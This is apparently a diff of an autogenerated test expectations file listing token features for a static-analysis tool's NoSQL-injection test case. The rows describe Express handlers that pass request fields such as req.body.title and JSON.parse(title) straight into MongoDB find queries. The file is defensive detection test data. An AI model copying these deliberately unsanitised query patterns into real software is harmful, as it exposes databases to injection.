title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:34 | exceptional return of doc.fin ... itle }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:34 | exceptional return of doc.fin ... itle }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:13:29:16 | find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:13:29:16 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:13:29:16 | find | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:13:29:16 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:13:29:16 | find | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:18:29:33 | { title: title } | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:18:29:33 | { title: title } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:18:29:33 | { title: title } | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1574,6 +8486,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:18:29:33 | { title: title } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:18:29:33 | { title: title } | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:18:29:33 | { title: title } | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:20:29:24 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:20:29:24 | title | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:20:29:24 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:20:29:24 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:20:29:24 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:20:29:31 | title: title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:20:29:31 | title: title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:20:29:31 | title: title | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:20:29:31 | title: title | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:20:29:31 | title: title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:20:29:31 | title: title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:20:29:31 | title: title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:20:29:31 | title: title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:20:29:31 | title: title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:20:29:31 | title: title | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:27:29:31 | title | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:27:29:31 | title | InputAccessPathFromCallee | 0.title | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:27:29:31 | title | InputArgumentIndex | 0 | @@ -1583,6 +8510,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:27:29:31 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:27:29:31 | title | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:27:29:31 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:11 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:11 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:11 | doc | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:11 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:11 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:16 | doc.find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:16 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:16 | doc.find | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:16 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:16 | doc.find | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:46 | doc.fin ... tle) }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:46 | doc.fin ... tle) }) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:46 | doc.fin ... tle) }) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:46 | doc.fin ... tle) }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:46 | doc.fin ... tle) }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:46 | exceptional return of doc.fin ... tle) }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:46 | exceptional return of doc.fin ... tle) }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:46 | exceptional return of doc.fin ... tle) }) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:46 | exceptional return of doc.fin ... tle) }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:9:32:46 | exceptional return of doc.fin ... tle) }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:13:32:16 | find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:13:32:16 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:13:32:16 | find | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:13:32:16 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:13:32:16 | find | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:18:32:45 | { title ... itle) } | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:18:32:45 | { title ... itle) } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:18:32:45 | { title ... itle) } | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1591,6 +8543,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:18:32:45 | { title ... itle) } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:18:32:45 | { title ... itle) } | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:18:32:45 | { title ... itle) } | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:20:32:24 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:20:32:24 | title | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:20:32:24 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:20:32:24 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:20:32:24 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:20:32:43 | title: ... (title) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:20:32:43 | title: ... (title) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:20:32:43 | title: ... (title) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:20:32:43 | title: ... (title) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:20:32:43 | title: ... (title) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:20:32:43 | title: ... (title) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:20:32:43 | title: ... (title) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:20:32:43 | title: ... (title) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:20:32:43 | title: ... (title) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:20:32:43 | title: ... (title) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:30 | JSON | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:30 | JSON | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:30 | JSON | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:30 | JSON | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:30 | JSON | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:36 | JSON.parse | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:36 | JSON.parse | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:36 | JSON.parse | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:36 | JSON.parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:36 | JSON.parse | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:43 | JSON.parse(title) | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:43 | JSON.parse(title) | InputAccessPathFromCallee | 0.title | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:43 | JSON.parse(title) | InputArgumentIndex | 0 | @@ -1600,6 +8577,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:43 | JSON.parse(title) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:43 | JSON.parse(title) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:43 | JSON.parse(title) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:43 | exceptional return of JSON.parse(title) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:43 | exceptional return of JSON.parse(title) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:43 | exceptional return of JSON.parse(title) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:43 | exceptional return of JSON.parse(title) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:27:32:43 | exceptional return of JSON.parse(title) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:32:32:36 | parse | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:32:32:36 | parse | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:32:32:36 | parse | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:32:32:36 | parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:32:32:36 | parse | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:38:32:42 | title | CalleeFlexibleAccessPath | JSON.parse | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:38:32:42 | title | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:38:32:42 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1608,6 +8595,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:38:32:42 | title | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:38:32:42 | title | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:32:38:32:42 | title | receiverName | JSON | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:1:37:3 | app | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:1:37:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:1:37:3 | app | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:1:37:7 | app.get | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:1:37:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:1:37:7 | app.get | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:1:45:2 | app.get ... });\\n}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:1:45:2 | app.get ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:1:45:2 | app.get ... });\\n}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:1:45:2 | exceptional return of app.get ... });\\n}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:1:45:2 | exceptional return of app.get ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:1:45:2 | exceptional return of app.get ... });\\n}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:5:37:7 | get | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:5:37:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:5:37:7 | get | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:9:37:14 | '/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:9:37:14 | '/:id' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:9:37:14 | '/:id' | calleeImports | express | @@ -1615,6 +8617,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:9:37:14 | '/:id' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:9:37:14 | '/:id' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:9:37:14 | '/:id' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:37:16 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:37:16 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:37:16 | MongoClient | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:37:16 | MongoClient | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:37:16 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:37:17 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:37:17 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:37:17 | query | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:37:17 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:37:17 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | 'arguments' object of anonymous function | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | (req, r ... });\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | (req, r ... });\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | (req, r ... });\\n} | calleeImports | express | @@ -1622,11 +8639,120 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | (req, r ... });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | (req, r ... });\\n} | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | (req, r ... });\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | exceptional return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | exceptional return of anonymous function | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | exceptional return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | return of anonymous function | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:17:45:1 | return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:18:37:20 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:18:37:20 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:18:37:20 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:18:37:20 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:18:37:20 | req | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:18:37:20 | req | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:18:37:20 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:18:37:20 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:18:37:20 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:18:37:20 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:23:37:25 | res | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:23:37:25 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:23:37:25 | res | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:23:37:25 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:37:23:37:25 | res | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:13 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:13 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:13 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:13 | query | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:13 | query | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:13 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:13 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:13 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:36 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:36 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:36 | query | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:36 | query | enclosingFunctionName | app.get#functionalargument | +| 